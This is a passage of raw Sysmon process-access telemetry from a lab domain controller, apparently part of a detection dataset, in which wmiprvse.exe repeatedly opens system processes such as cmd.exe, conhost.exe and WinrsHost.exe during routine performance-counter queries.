13:54:44.517{10ACEC4A-8552-5FCF-4900-000000009101}39283964C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-85A1-5FCF-E100-000000009101}1184C:\Windows\system32\cmd.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6 10341000x80000000000000004857Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:44.517{10ACEC4A-8552-5FCF-4900-000000009101}39283964C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-85A1-5FCF-E100-000000009101}1184C:\Windows\system32\cmd.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6|C:\Windows\system32\wbem\wmiprvse.exe+178f7 10341000x80000000000000004856Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:44.517{10ACEC4A-8552-5FCF-4900-000000009101}39283964C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-85A1-5FCF-E000-000000009101}3324C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6 10341000x80000000000000004855Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:44.517{10ACEC4A-8552-5FCF-4900-000000009101}39283964C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-85A1-5FCF-E000-000000009101}3324C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6|C:\Windows\system32\wbem\wmiprvse.exe+178f7 10341000x80000000000000004854Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:44.517{10ACEC4A-8552-5FCF-4900-000000009101}39283964C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-85A1-5FCF-DF00-000000009101}3196C:\Windows\system32\WinrsHost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6 10341000x80000000000000004853Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:44.517{10ACEC4A-8552-5FCF-4900-000000009101}39283964C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-85A1-5FCF-DF00-000000009101}3196C:\Windows\system32\WinrsHost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6|C:\Windows\system32\wbem\wmiprvse.exe+178f7 10341000x80000000000000004852Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:44.517{10ACEC4A-8552-5FCF-4900-000000009101}39283964C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8575-5FCF-8600-000000009101}4628C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6 10341000x80000000000000004851Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:44.517{10ACEC4A-8552-5FCF-4900-000000009101}39283964C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8575-5FCF-8600-000000009101}4628C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6|C:\Windows\system32\wbem\wmiprvse.exe+178f7 10341000x80000000000000004850Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:44.517{10ACEC4A-8552-5FCF-4900-000000009101}39283964C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8575-5FCF-8500-000000009101}4616C:\Windows\system32\WinrsHost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6 10341000x80000000000000004849Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:44.517{10ACEC4A-8552-5FCF-4900-000000009101}39283964C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8575-5FCF-8500-000000009101}4616C:\Windows\system32\WinrsHost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6|C:\Windows\system32\wbem\wmiprvse.exe+178f7 10341000x80000000000000004848Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:44.517{10ACEC4A-8552-5FCF-4900-000000009101}39283964C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-855E-5FCF-7D00-000000009101}652C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6 10341000x80000000000000004847Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:44.517{10ACEC4A-8552-5FCF-4900-000000009101}39283964C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-855E-5FCF-7D00-000000009101}652C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6|C:\Windows\system32\wbem\wmiprvse.exe+178f7 10341000x80000000000000004846Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:44.517{10ACEC4A-8552-5FCF-4900-000000009101}39283964C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8552-5FCF-4100-000000009101}2804C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6 10341000x80000000000000004845Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:44.517{10ACEC4A-8552-5FCF-4900-000000009101}39283964C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8552-5FCF-4100-000000009101}2804C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6|C:\Windows\system32\wbem\wmiprvse.exe+178f7 10341000x80000000000000004844Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:44.517{10ACEC4A-8552-5FCF-4900-000000009101}39283964C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8551-5FCF-3800-000000009101}3612C:\Windows\System32\vds.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6 10341000x80000000000000004843Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:44.517{10ACEC4A-8552-5FCF-4900-000000009101}39283964C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8551-5FCF-3800-000000009101}3612C:\Windows\System32\vds.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6|C:\Windows\system32\wbem\wmiprvse.exe+178f7 10341000x80000000000000004842Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 